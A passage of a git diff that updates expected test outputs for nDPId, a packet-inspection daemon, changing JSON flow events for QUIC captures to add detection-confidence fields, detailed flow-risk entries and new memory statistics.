YhltzgO0VmcidYbokhyBxc5p8EN7Brdd5jbC5KWU5ziyf1Xh75DhXXM9GVyTUDxQyOG\/19oznEsnm6HNfViWsEBqqhaXc1PD0G1Ath517JUA\/pAp9aK6ha0kEfZOISLrdAh\/wfyRh1qF0vTiaYWT3z2kewwb2CKR6DkEQkLWuW6ksgBnomifnuXO\/A4qhCgYZUw8feNCqTOFonKJtx2NUnViJDtqHr07cnNA2vZFiN+8SsLW130LG60Uj0wsHpIPMQDNy88BvEV2fH8Yk1GkJTndWveloeKe4e8X8FUWonC0LnETHyEJoR6mY698HICIqyNVbCWwwIZl3RhkLsYcNRGWOHE1xH8nz2KWwIwVPQWegjsOIMvejTuWRloCSQB2gHaBGQDAQAAAAAAAAAAAAAAFgABAAIAIQHaAAAAAAAAAAAAAAAAAAAAAB\/S7Lg="}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":41432,"flow_last_seen":50392,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":9519,"flow_avg_l4_payload_len":475,"midstream":0,"ts_msec":50392,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":41432,"flow_last_seen":50392,"flow_idle_time":180000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":9519,"flow_avg_l4_payload_len":475,"midstream":0,"ts_msec":50392,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600830 bytes
-~~ total memory freed........: 4600830 bytes
-~~ total allocations/frees...: 99585/99585
+~~ total memory allocated....: 4685783 bytes
+~~ total memory freed........: 4685783 bytes
+~~ total allocations/frees...: 101175/101175
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
 ~~ json string max len.......: 2196 chars
diff --git a/test/results/quic-mvfst-exp.pcap.out b/test/results/quic-mvfst-exp.pcap.out
index e354e1f40..b7d8d61f7 100644
--- a/test/results/quic-mvfst-exp.pcap.out
+++ b/test/results/quic-mvfst-exp.pcap.out
@@ -1,10 +1,10 @@
 00446{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1600365863681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1600365863681,"pkt":"AAAAAAAAAAsAUu6Rht1gBpyIBNgRPyqszffVBngHkJIHX6lj9Ks\/Zezp\/nFuKvrOsAwAADWO4PMBuwTY\/EXK+s6wDgg1+NsuZhAnFwAARL4kVSVotvSiGmEI+vf+6CaV5hF7i\/CNKP0SXP7gxh\/sxeTenPB321XyE03WMCMX5b0eBa3DvRz2ddP3nWt6RdJ6WlZ9RTUGfAgTt+boE098trxFEsZIDO4\/DGShxxtoHXyvbFJFZJY0NVf+5UIwrXhHYlSki1K9uuFNSNm\/ALl0YIaUgr\/hopr4M+GsiGyiXAxXGDCmRgFFJroypQa7DZkA\/BSQvOBo1rqXUCQO+Y2WWIxccuRC5scGp+LAauwOKvDUuqswyG3OiHxvk+4qy\/tgRCHGZHD5raZzP7vxY5Zs6GXSOIKOFNW9+pK0jmGVAbreKgkrE9sNhCR5J7EDI\/UBo5nIVV7hZ+6dUskPxqT226TZBRzj0d\/LhQMJiWr\/Qtbyf20wKLkGnJvpCUZRODDUv\/HGzAiYKec9iLyl0xI4dsRlBPj3\/qk96+vHWCFBI5LJgkJSDIg2Oo0As+19Rmue72aosPjR8lHRyP7b2qSVRFvzkCL3hktDhhGNO2\/8vk6Dat1dxesYiMWkhhopkoH3vOXEevmQ1BrZpcIa7nhP0ob5JIk\/hYvfODfiXG2nnd65+lyb3xKLOkY1QOG2eHx4XtxJxV95ybltVj+AOro0Qb33f0uOBVhhxvPUxRnp1BveoGGqIq\/gfX6EzojL9Sr70hu0h97z51g5q\/G2yqDMTtMccVw+1tkM704jcVZPtS1KIRHzNry1Wih4L55uLybOgft8GHReUqVXO1rtmuTmjHvXxkkq+hW3ZO6Zpt9Zifkk1BLxuaoYoAdg22ALnpTN7VcYCixWlGY122eH2AkgeHYXtrQFh65CCR9dukVHEdRzSFLcF70tHYbZmR+Hm+VVpk48niHEmJvv4wz9TBdQco4TCXjTYLJ6WcVyXCnuHUIWmzQviL8DqcqYSvAxXtEwy\/ABThsNXM6AftQYLRXbcYkYcHWoidGESnafRJGVZwQz25kCkv7ZqgFWYx1xBNnbz9WMnFbBke3DlYRgpZd0ntBDhPehb1WGgxtlkSGO7bjYqCQFYUxhzr1MjEh8JkUM3KCwxgTJlwEoiFSZNBGWOnQnoaXqibsTGdkQ5xDUg\/xJIomN6D9X+YN7QfJRKDelG4gB\/R7MztnSA22E0XjX\/\/YRNN+qvPmrVWdwLFx5rwOTZ2Bwq1XJX0Y4X9FYc8xlkhOJreo9JcUXHssUuTUo6BWARFU9bhlwavKy3u7J0kMozdjG\/WbocG2iKuKdvYnwlwF4XA49pUvEDnV0LhAGSigDeY9WEVq5NPU8kaL0aKpcV9sZJjCTDkCQvVnASsCd3+zuMIFTH\/wm3IfeUdpSYh69FBYn0JPZJnE\/f2WC+G83QQZNTxoXLd9yFjxvmJQ7W1L4zZf2d490E4pdqLfAEFuTNKFuLGgQ+LZN4YH\/5qowNrJyvVezIyiysoAoiKoYlx0R5mslIlSfPbwSJbTB1uxs3rqeOf8ivbtSiOzeCzsWNJXJslzqZupoGqw7\/SmaFxzLXGXzdi02UgxbJUV3MNetwoWntiOQ\/Z\/49uutTCmO52WyUtp6uT2QPgpYOad0YVkiJmMQURNTDa6EXQiGewAMntXsHYGBjMrsKmJQ9FFiiK9Zn62NIBtpITbvAg=="}
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"video.fmct2-3.fna.fbcdn.net","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}}
+00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"video.fmct2-3.fna.fbcdn.net","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}}
 02130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1600365863701,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1600365863701,"pkt":"AAAAAAAAAAoAaIxPht1gAAAABNgROz9l7On+cW4q+s6wDAAANY4qrM331QZ4B5CSB1+pY\/SrAbvg8wTYmwjO+s6wDgAIQAXJhFchLk8ARL4QIqQn9j8g7J8Bh4qCkeFtB5\/0FGTn+dKSN5WCFIbqlv7bVzxI20ou9DR4wZtJJ1tiJ+xKr0U8bw68OiZZpHUxdfAbQt5z9nLh6LwQjhupiCyRyGRG4tZtrrKw42zS4Ryis2IGVu85jtVJ5nO+V0iHkiCiLoE8hCZ0cGFWISDSv1dY3S14L6Uo3v29iGRvafufSczvMFlG6pV1Odn60vjKDyGOsjNfQ9JF1v3zXLwm1apIxIVcfBTY7dYxW+7A\/6rJf9YKYeoWeijbkQb34JP1dRaHcbT0etmi0uxefz\/YpbkDoFCI2oRZYlTE23H22X2\/8qTclFOyvh9\/vrwFZRygQGeuEH0eSUfPKF67ybi2A9VLUgtZeELBeNOyIaY60evevqb5J2vN5l8HhG0zOtje8P2BEWzkJo0Csm59hN04WUIa5ATdibyB79oIitMR\/RT8b5BC7j9v8ipjp7vZOZEdpCwIDJgn2+33CJSdL94AfQkLgk+uiUPVfgG6UfHrZnytLApyrmygXaAukdakyxq8klTjQRRDyfNa3VwsyyGBmq5gY8nskXcJNY50BpTnu2okLH4hDlVPoMhoCfYEzT7EHkcCPMiRCP1enF\/yeF8dCloVpkR+7DVld9MS6A1Lm8Vh1cgyHuQtCdgJL16zetK\/eyN+QHBXERWmIl3nQXc4BBMK5ejTHXiedJd7krVe8qEtgPgfs9wmex+wAK7s5a4apAlIsdt8wz8irGiTLVD13enE0LCSiK+iT4XC+unYkKdA\/Y+wC15ozprq5ssSs4BUO4\/LwAxujOwLjXa68Kc\/HILSJzhfUsfYNAz8ZOR1P4+bGu9drz2VDwRHLiESKyby173GizQy9QPlUMhgv8zZQ9s8\/V4XeqMJ2FBmnAhANLW8ozDP3m1tk1Eysb4\/m\/zhRgvMN6Md\/gGHDzGnf86ee9efaPJdzEGlKuMWsJB9rG8dFeoooOlhDVE0RcRoPulOkfUBVPkd5y1hJVChJAS8upfL7rieCvjioLCngyXZRWw5EtbWEua8f58+BR4BcVUt44qeVBM19jSN8fMZZCruGfLvFJ8LXrWCMFf8QO9ppSf6AUMeDx2xJm\/vFPFkKj8USDUUV3A4BGBehJmSMJTIQdNx+L65jyOdOELItpQ53YcWuejF0bJ6ksEA2i+ns6L\/A4TyViXUhBAVmjDLSCellA9lXrJ4FKFi2ddTtc7XO4WCnc0rXB48fPr0idZPP5kV7JjzsYEnZ8xNPrb2\/crCya5nVZMRH13HQUZZTbK+kcSm91aipEqc2RxTK15a3fE2lVuvJTMS7pY+WzcwkPFNhssmcyRE4TsroEk6noloCsxsQjvyZSEcSwSKx4KJegr4NeCh6RxPXe153PB1fX43\/bpL23QEtBIoibzoy6LAuxzsnv2SoFcWb+0UW2hrfng6tjiLOL78QaL2I0pt8Q8p5cHXe8AZixhNLMuBlkVaMkSQfTYE7a0q89JM+YV0fG49Y5VAbDOBtfzmYnlO9p9ri9AifV7FZEwCvdDlnQ+KvbXRJdIOtcMSTz6mCvUiZ2cGGkiUCLImG1NMuhrftxnzx3oMcBYdm8CBM4CS3ZhaADSEfSg2j+9P8DImBKXKQw=="}
 02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1600365863701,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1600365863701,"pkt":"AAAAAAAAAAoAaIxPht1gAAAABNgROz9l7On+cW4q+s6wDAAANY4qrM331QZ4B5CSB1+pY\/SrAbvg8wTYHDzk+s6wDgAIQAXJhFchLk9Ev6msTcUGYFaKjK1nnOGqPfgGmbd2yH7YezNJksz4ObKOyK4ooRfPYXnIwINVzU9kFmpDrySNcGo7oy085NMAXtrRBQxP\/BNGfiNh2k7HVEmtnbBrN9B4q0PdqBJlnR3nfvlqn4KMbB+v3pyflyp0t2eXjVN9BCvAEWt1323hMhRhYp7IjuM\/7LS+4JZqwAit2H9\/as8+O1Z3qJKcua5iRqQUGQX4hx+lXxOP6XwWXKQ9UBS95a7rhiJrqp9UhK13hVq2njbzA2RTKn+s6aobHuCe7WYl8MS0v+T1I2mq6xhFweTuG3hdPnqOkRm4ZoVgOJD0lCKOsJoqR\/flxx3xDBRfRXA8iUDaNTTEDU\/z02HAUlthQ7j4NctXjWeuXBBlOg7myIMc\/qdP9kFsh+WR6c3MixjpAvWeqwTgRfaK9+1rOtle4mwbhL9JoI7ra+3Gv2NscrKYby4y26dOybmnMTxwtUycCSAskoGy0VBL8N4JHmZ24PfumlXDiIGg2TKa89dG5C\/HkH2BkzPa1N4KDB4DWk6vrxpVEaDtN+T4HBAwv5vr27n4ZsI+e+KkpDTUVeRt50at0s6GoBT3dU0bS5u7btTCPh9Q1wT2QzGXBx7LpZUB7WKGCAuzDm\/R\/0DsgE98U+jp\/GQA0cAouUv\/ia5B4dArOX2Hrh68\/LWZUcgSOk4Mb6isI1HW4FG8qqFdvzMsYyg1nY6\/mwkjTgfzcUcT8HuT8b3VEAFl1iojo++o6URU0CqxVGRv\/\/1U12juUa9BOlngQwkpzTFGYZpnjBvHYYqGgaZguBUx+OsJazqFqHN19AyL0Cexa75QT9qZtk9tlxGc5gUfqCX+xv3PoF1DxwRReTjQ6GUHNrQvfC+a6lJLkY2Bl3ty6kTSniC0uwNMTlaRzlXCmLXOF\/spgpAb4J+XbuA0NFIBJPbBj0R9yb2qZMfcDSVc01ubKMDR7P8+q\/ujxavqxlOlRZ7sWwAht5G68KiSsHb\/3\/\/02Hn9LDN5RMC7i0XnG5j+4mV0HA\/xhs5p4cwjOIcpOhsDt89zfffoiq59dKLm9k8JMdheqZnJmgMgBN6WVdrtRW3QVuAWi5RMKLwkPwNbBlRiZ7vzcC0isWQeIhVQokyi3N3zirO2CgYfmItTVGQ2zRdOvhKQCqtBpADZshhP71+ve\/mG\/ZuBnSTjROHtGsF0IToyFyclFG850LYNt2AK7xXn6KoFoVxoXz2L1VgOHjSwdoUQ19OP2FjGJxXDbRibAbzK8ZTPhWbes9V2wQus09AwDRo1tAPoOt8iAFo0luKi1hunaWIbYQU7ulHqooKgCNKaw7Wpw5p7aBaAi2l+FM0QE0XvSek9UgM9xUI8mGJp9C08XT9sbpCwgHL3HCxNUV5PMTiLkvNmY4VY0RA6MyaCk5fo74e5RCmQDSSqS96ehyCpgP+n+wZ6UBRKek9YDjVH4RHvmZCvYco7SKBDJbbMddFHN3+HFbSO2rxv8iuy6DZaiePYnuW\/mxUn+OUffPWu97Jt4A0bz8W3eamvrlSSbu6c70YR1qFE42450VRE4NhhFL8v\/i0jKrz069uRv1GcqnqW1Vv22X49oie0v9YMThrSkmy8c0tELsKMRwtXMA=="}
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1600365863681,"flow_last_seen":1600365863839,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":24449,"flow_avg_l4_payload_len":814,"midstream":0,"ts_msec":1600365863839,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1600365863681,"flow_last_seen":1600365863839,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":24449,"flow_avg_l4_payload_len":814,"midstream":0,"ts_msec":1600365863839,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00162{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 30/30
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4601120 bytes
-~~ total memory freed........: 4601120 bytes
-~~ total allocations/frees...: 99595/99595
+~~ total memory allocated....: 4686073 bytes
+~~ total memory freed........: 4686073 bytes
+~~ total allocations/frees...: 101185/101185
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
 ~~ json string max len.......: 2146 chars
diff --git a/test/results/quic-v2-00.pcapng.out b/test/results/quic-v2-00.pcapng.out
index 3e9520d94..2bc2a0cf9 100644
--- a/test/results/quic-v2-00.pcapng.out
+++ b/test/results/quic-v2-00.pcapng.out
@@ -1,10 +1,10 @@
 00444{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-v2-00.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-v2-00.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637834659980,"flow_last_seen":1637834659980,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1637834659980,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":50277,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-v2-00.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1637834659980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1637834659980,"pkt":"CAAnfrFjCgAnAAAACABFAgUApRBAAEARnsLAqDgBwKg4xsRlEVsE7OHRwv8CAAAIrj891mmhU7MITo0Xtz5eoNQARMoxqNSV7ADoFS7QxZ4\/HLjYUQBcyNcuN8bWG62+xF99Aye9DaJmsH6KCNcXJhjzha2fPdBZdc4Nidwy8pCVeYmH4yM6vXMdZ9UMG9ccEeFY0I8OcdmCSXa5odhdufBB8IiExzry\/kH3tbfUjXG04iCN+nOW3sUvM9jYBjMbDtvxmp3pNIhkRBYoqbdUsrgnC8gxSkuovl57ULo\/sHveA0VUZAGJSxTmVKe0r07WTY8Vme8cfKQuhCJyJQ0u6fy9TRgZZXMRXC0eJFf7TJ8th7p5hroNv6bLzmOuPgjvNTNJHwrDyFSySUxVtcYIdHVVK87NTKPpEsdU1rVG0M5a4NB7IceprsnY26+xxntF6CSj3awhr3bTkwpEEUY97+p1ajX+D8g1I4aOX6rhaGAvrlzvXuUaEGOgKPnQ+AUWgI4et+ESZ0jx95yNVOZMOIz03NHVCKK7sdoCvaV6DvfXrxC8VlZ\/voiimBSm4fxQtoq\/ehX+TDbJpuRVnW6tNqvoqo6b\/2mSeCze+AQTzCbQpJ9VxRP1OFSZb\/ZvwGL1xj+B+gsuWBOb2AKjTbcvrTFxQzjTz05z\/BTm\/8w6cUnlTZjNa6p5dHreDqezRbSD7lRQGWYzSIxQvxfAw3DmeDsgfIfLxIqlbjPAc7d1HLNRpPfAu9Xl2s0TOHTNNjxjvzFCmvhejA7r8fwovA9MGeABUWwJKX2lyb2KKRc6ZJ\/qwh1AmX1b27zLxiD3bmnWKipDS2J7nLbuit+X+x06cImd6I0jpxyszf9KlN8iShBGZLqWJuv4Sjm\/dbK5NAaFMyuxjutoHwHvt07Y0ybvrYM9q8eVqN2oXETUg3Q3JUPV6WrxRbJl02cOpYDWQmBbK32W+peQ6GgIPEGKh9xa53uYTOijgYPO7CzdBEq3yxlRm5mC45k9OnUXWP+pF\/\/3iqFzsEKAmw40YLrHgEhrRPwPwjA\/dEAdjlHQzLuPuJq\/lyh\/hngZe3iwYssgO+tjI9yT4GdtlNlxQxO2O3GnJGqReBKmRxUAIhvO4FGZvjzwaSnuQrlkrbMarvFnXBuA5xyokJGnx4Iuzxr8AuV8zTQH+3jPA\/IQu7te8iyjuipCCygjw5xX59DLE12WjOG6koGVDaTnK7EbaGXrceFbkurw9qrtaiM69Yc9LMJ8TlSB2bvsKUS5ROi5bB7Lkinodsq5TR+EIX9Vm4IdcjVjEMLk4PtAnY002vWcKoj7dqnG3PPxJ9jU5ZgalNcld216l74snMEx+DiVUziQSuix\/uhvgPCsbbNV7hTCbZgZrDyKiDQRY4+3\/aHIQ1egJTtTtCRN9\/hWBzta55pccPOZDmu4uFONofh4h8xzoTP70OytaDdl0wQ\/Ei3lAuHXsCv8+mDaCq5lkkdaZ4yec+Y7QXFDsftrwvwkHfmK1cVGIkQNhKGTJhXsAPIvMTJrvHKrKfkAkhkpujyQ9rOaLYnu9tKAqSFHSGbT4+tf9GwvC\/qe1icEqu7DGJuTrYJX248FiL4Ch+mdl93W3xuioDiePz\/LIUFTufH2qrWjaZO246tacboPOhhUtoHXq9yDKn+WDGCcQai7+YX70MiOjB7M+ZA9r4rhA4BnGOCHFairuSvx7tyf1IdmjIxzRQkOzw=="}
-00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-v2-00.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637834659980,"flow_last_seen":1637834659980,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1637834659980,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":50277,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
+01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-v2-00.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637834659980,"flow_last_seen":1637834659980,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1637834659980,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":50277,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-v2-00.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1637834659981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"ts_msec":1637834659981,"pkt":"CgAnAAAACAAnfrFjCABFAgB2689AAEARXI3AqDjGwKg4ARFbxGUAYl4L8P8CAAAITo0Xtz5eoNQIzn6Zws0tgzR89MPJKWOEcQosGt5JnvFEzbxq7ueyicjryx4GEYRiBPVuCO\/u++qyU+1Oe0oBZ5OgZN57Q6zBwe7HF\/MNE0OW9jWa"}
 02127{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-v2-00.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1637834659981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1637834659981,"pkt":"CAAnfrFjCgAnAAAACABFAgUApRFAAEARnsHAqDgBwKg4xsRlEVsE7Ggoxf8CAAAIzn6Zws0tgzQITo0Xtz5eoNQzfPTDySljhHEKLBreSZ7xRM28au7nsonI68seBhGEYgT1bgjv7vvqslPtTntKAWeToGTeRJcWE0YjWjjVhc2Epc6uRtR8VN2t2fxi\/BKMmIkOV87hdjuuQq+sQZ0aP+qAWUZVPXYTQHrsn74n\/20No0K3IRfMpFAohmoCuHG\/oQ2kWLkh177bcXYP5JJlk8DkeqaOI5jJHhZopdC0EbAUvMxzupw+jzNBfqVtawmI7ck4oaVbSmv2Lh6DWiZpOV9olm9oIGBvX2BwaSJD1b